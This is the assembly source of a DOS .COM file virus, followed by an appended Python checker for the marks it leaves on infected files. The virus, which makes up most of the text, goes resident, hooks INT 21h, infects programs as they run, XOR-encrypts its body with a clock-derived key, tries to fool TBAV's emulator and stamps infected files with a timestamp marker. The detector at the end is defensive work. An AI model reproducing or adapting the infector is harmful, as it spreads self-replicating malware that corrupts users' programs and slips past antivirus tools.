;******************************************************************************
;******************************************************************************
;****                      Virus: .COM /noTBAV                             ****
;****                        By: Ramthes Jones                             ****
;******************************************************************************
;******************************************************************************

CODE    SEGMENT
        ASSUME CS:CODE, DS:CODE, ES:CODE, SS:CODE
        ORG 0100h

DELTA   EQU (TWO - ONE)                 ; total length of the virus body

START:
        JMP VIR_START
        NOP
        MOV AH,09h
        MOV DX,OFFSET MSG
        PUSH CS
        POP DS
        INT 21h
        INT 20h

MSG     DB 0Ah,0Dh,'Virus Mr-X activado!!!',0Ah,0Dh
        DB 'Por favor no ejecute ningun archivo. Je, je, je...',0Ah,0Dh,'$'

; --- decryptor: everything from BEGIN-1 to TWO is XORed with a one-byte key ---
VIR_START:
ONE     LABEL BYTE
        MOV BX,015Dh                    ; patched per victim: address of ONE
        PUSH BX
        MOV SI,(OFFSET BEGIN - OFFSET ONE) - 1  ; known
        ADD SI,BX
        MOV CX,(OFFSET TWO - OFFSET BEGIN) + 1  ; known
        MOV DX,0FFCDh                   ; FFCD = INT FFh
        CLI
BUCLE:
        MOV AH,[SI]
        XOR AH,00h                      ; immediate is the key, patched at infection time
        DB 06 DUP (90h)
        MOV [BX+30],DX                  ; self-modifying trick aimed at TBAV's emulator
INTFFh  LABEL WORD
        MOV [SI],AH
        MOV [BX+30],2488h
        INC SI
        LOOP BUCLE
        STI
        JMP ATBV
JODER:
        MOV AH,4Ch
        INT 21h
ATBV:
        MOV AH,30h
        INT 21h

; --- decrypted part starts here: "are you there?" check via INT 21h AX=ACACh ---
BEGIN:
        MOV AX,0ACACh
        INT 21h
        CMP AX,0CACAh
        JE RUN_COM
        JMP STAY_IN_MEMO

; --- restore the host's original first 3 bytes and jump to 0100h ---
RUN_COM:
        PUSH CS
        PUSH CS
        POP DS
        POP ES
        POP BX
        MOV DI,100h
        LEA SI,[(NORMAL - OFFSET ONE) + BX]
        MOVSW
        MOVSB
        PUSH CS
        PUSH 0100h
        RETF

; --- go resident: shrink own block, allocate a new one, mark its MCB as owned by DOS ---
STAY_IN_MEMO:
        MOV AH,4Ah
        XOR BX,BX
        INT 21h
        MOV AH,4Ah
        MOV BX,0FFFFh
        INT 21h
        SUB BX,61h                      ;101h
        MOV AH,4Ah
        INT 21h
        MOV AH,48h
        MOV BX,60h                      ;100h
        INT 21h
        MOV ES,AX
        PUSH ES
        DEC AX
        MOV ES,AX
        MOV ES:WORD PTR [0001h],0008h
        POP ES
        PUSH CS
        POP DS
        POP SI
        PUSH SI
        XOR DI,DI
        MOV CX,DELTA
        CLD
        REP MOVSB
        PUSH ES
        POP DS
        MOV AX,3521h
        INT 21h
        POP SI
        PUSH SI
        MOV DS:[INT21IP - OFFSET ONE],BX
        MOV DS:[INT21CS - OFFSET ONE],ES
        MOV AX,2521h
        MOV DX,(OFFSET HOOK_21 - OFFSET ONE)
        INT 21h
        JMP RUN_COM

; --- INT 21h handler: intercepts EXEC (AX=4B00h) and the residency check ---
HOOK_21 PROC FAR
        PUSH DS
        PUSHF
        PUSH AX
        PUSH BX
        PUSH CX
        PUSH DX
        PUSH SI
        PUSH DI
        PUSH DS
        PUSH ES
        CMP AX,4B00h
        JE INFECT_COM
        CMP AX,0ACACh
        JE GIVE_MARK
        JMP FIN
GIVE_MARK:
        POP ES
        POP DS
        POP DI
        POP SI
        POP DX
        POP CX
        POP BX
        POP AX
        POPF
        POP DS
        MOV AX,0CACAh
        IRET

INFECT_COM:
        PUSH AX
        PUSH BX
        PUSH DX
        PUSH DS
        PUSH ES
        MOV AX,CS
        MOV DS,AX
        MOV AX,3524h                    ; save INT 24h and install a silent critical-error handler
        PUSHF
        CALL DWORD PTR DS:[INT21IP - OFFSET ONE]
        MOV DS:[INT24IP - OFFSET ONE],BX
        MOV DS:[INT24CS - OFFSET ONE],ES
        MOV AX,2524h
        MOV DX,(OFFSET HOOK_24 - OFFSET ONE)
        PUSHF
        CALL DWORD PTR DS:[INT21IP - OFFSET ONE]
        POP ES
        POP DS
        POP DX
        POP BX
        POP AX
        PUSH DX
        MOV AX,4300h                    ; save attributes, then clear them
        PUSHF
        CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
        MOV CS:[(ATRIBUTOS - OFFSET ONE)],CX
        MOV AX,4301h
        MOV CX,20h
        PUSHF
        CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
        JC FINAL_1
        MOV AX,3D02h
        PUSHF
        CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
        PUSH AX
        POP BX
        MOV AH,3Fh
        MOV CX,2
        PUSH CS
        POP DS
        MOV DX,(OFFSET NORMAL - OFFSET ONE)
        PUSHF
        CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
        XOR SI,SI
        MOV AX,CS:(NORMAL - OFFSET ONE)[SI]
        CMP AX,'ZM'                     ; skip EXE files
        JE FINAL_1
        JMP CONTI
FINAL_1:
        JMP FINAL
CONTI:
        MOV AX,5700h
        PUSHF
        CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
        MOV CS:[(HORA - OFFSET ONE)],CX
        MOV CS:[(FECHA - OFFSET ONE)],DX
        AND CL,00011111b                ; this is the right way to check
        CMP CL,00001101b                ; whether the seconds field is 26
        JE FINAL_1
        XOR AL,AL
        CALL F_42h
        MOV AH,3Fh
        MOV CX,3
        PUSH CS
        POP DS
        MOV DX,(OFFSET NORMAL - OFFSET ONE)
        PUSHF
        CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
        MOV AL,02h
        CALL F_42h
        PUSH AX
        SUB AX,3
        MOV SI,1
        MOV CS:(BUFFER - OFFSET ONE)[SI],AL
        INC SI
        MOV CS:(BUFFER - OFFSET ONE)[SI],AH
        PUSH BX
        MOV AH,48h
        MOV BX,150h
        PUSHF
        CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
        MOV ES,AX
        POP BX
        PUSH CS
        POP DS
        XOR SI,SI
        MOV DI,SI
        MOV CX,OFFSET TWO - OFFSET ONE
        CLD
        REP MOVSB
        PUSH ES
        POP DS
        POP AX                          ; compute
        INC AH                          ; the address
        XOR SI,SI                       ; where the
        MOV [SI + 1],AL                 ; infected file's
        MOV [SI + 2],AH                 ; code will start
        MOV AH,2Ch
        PUSHF
        CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
        MOV [SI+20],DL                  ; hundredths of a second become the XOR key
        MOV CX,(OFFSET TWO - OFFSET BEGIN) + 1
        MOV SI,(OFFSET BEGIN - OFFSET ONE) - 1
ENCRIPTO:
        XOR ES:[SI],DL
        INC SI
        LOOP ENCRIPTO
        MOV AH,40h
        MOV CX,DELTA
        XOR DX,DX
        PUSH ES
        POP DS
        PUSHF
        CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
        JC FINAL
        MOV AH,49h
        PUSHF
        CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
        XOR AL,AL
        CALL F_42h
        MOV AH,40h
        MOV CX,3
        MOV DX,(OFFSET BUFFER - OFFSET ONE)
        PUSH CS
        POP DS
        PUSHF
        CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
        MOV AX,5701h
        MOV CX,CS:[(HORA - OFFSET ONE)]
        AND CL,11100000b
        OR CL,00001101b                 ; stamp seconds = 26 as the infection marker
        MOV DX,CS:[(FECHA - OFFSET ONE)]
        PUSHF
        CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
FINAL:
        MOV AH,3Eh
        PUSHF
        CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
        MOV AX,4301h
        MOV CX,CS:[(ATRIBUTOS - OFFSET ONE)]
        POP DX
        PUSHF
        CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
        MOV AX,2524h
        MOV DX,CS:[INT24IP - OFFSET ONE]
        MOV DS,CS:[INT24CS - OFFSET ONE]
        PUSHF
        CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
FIN:
        POP ES
        POP DS
        POP DI
        POP SI
        POP DX
        POP CX
        POP BX
        POP AX
        POPF
        POP DS
        JMP DWORD PTR CS:[(INT21IP - OFFSET ONE)]

F_42h   PROC                            ; LSEEK: AL = origin, offset CX:DX = 0
        MOV AH,42h
        CWD
        MOV CX,DX
        PUSHF
        CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
        RET
F_42h   ENDP
HOOK_21 ENDP

HOOK_24 PROC                            ; critical-error handler: always "ignore"
        XOR AL,AL
        IRET
HOOK_24 ENDP

INT21IP     DW 0
INT21CS     DW 0
INT24IP     DW 0
INT24CS     DW 0
INT17IP     DW 0
INT17CS     DW 0
ATRIBUTOS   DW 0
HORA        DW 0
FECHA       DW 0
BUFFER      DB 3 DUP(0E9h)              ; JMP rel16 written over the host's first 3 bytes
NORMAL      DB 3 DUP(90h)               ; the host's original first 3 bytes
HIDDEN_MSG  DB "Ramthes. World Cup'98: ARGENTINA!!"
TWO     LABEL BYTE

CODE    ENDS
        END START
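A defender-side checker for the markers this infector leaves on a victim, added here as an example and not part of the original listing: the JMP rel16 at offset 0, the constant decryptor prologue, the XOR key at body offset 20 (from `MOV [SI+20],DL`), the hidden string inside the encrypted range, and the seconds = 26 timestamp. The opcode encodings in the signature are assumptions from standard 8086 encoding, with wildcards where they vary per file or per assembler; the sample image is constructed test data.

```python
import re
import time

# Hidden string from the listing; it sits inside the XOR-encrypted body.
HIDDEN_MSG = b"Ramthes. World Cup'98: ARGENTINA!!"

# Offset of the one-byte XOR key relative to the start of the appended body:
# the infector stores it with MOV [SI+20],DL (SI = 0), and the decryptor reads
# it back as the immediate of XOR AH,imm8 at that same position.
KEY_OFFSET = 20

# Unencrypted decryptor prologue (ONE .. XOR AH,imm8) as a byte regex. The
# opcode encodings are assumed; wildcards cover the per-file immediates of
# MOV BX / MOV SI / MOV CX, the assembler-dependent ADD SI,BX, and the key.
DECRYPTOR_SIG = re.compile(
    rb"\xBB..\x53\xBE....\xB9..\xBA\xCD\xFF\xFA\x8A\x24\x80\xF4.", re.DOTALL
)


def scan_com(image):
    """Return infection details for a .COM image, or None if no marker is found."""
    # The infector overwrites the first three bytes with JMP rel16 to the body.
    if len(image) < 3 or image[0] != 0xE9:
        return None
    disp = int.from_bytes(image[1:3], "little")
    body = (3 + disp) & 0xFFFF          # file offset of the appended body
    m = DECRYPTOR_SIG.match(image, body)
    if m is None:
        return None
    key = image[body + KEY_OFFSET]
    # Everything from BEGIN-1 to TWO was XORed with the key; decrypting the
    # whole tail after the prologue is enough to expose the hidden string.
    tail = bytes(b ^ key for b in image[m.end():])
    return {"body": body, "key": key, "hidden_msg": HIDDEN_MSG in tail}


def has_time_marker(mtime):
    """Victims are stamped with seconds = 26 (13 in the 5-bit DOS field)."""
    return time.localtime(mtime).tm_sec == 26


def build_sample(host, key):
    """Construct a synthetic image carrying the markers (test data only, not an infector)."""
    prologue = (b"\xBB\x00\x00\x53\xBE\x00\x00\x03\xF3\xB9\x00\x00"
                b"\xBA\xCD\xFF\xFA\x8A\x24\x80\xF4" + bytes([key]))
    encrypted = bytes(b ^ key for b in b"\x90\x90" + HIDDEN_MSG)
    disp = len(host) - 3
    return b"\xE9" + disp.to_bytes(2, "little") + host[3:] + prologue + encrypted
```

Run `scan_com` over the bytes of each .COM file and `has_time_marker` over its mtime; a hit on both is a strong indicator, while the timestamp alone only marks a file the infector would skip.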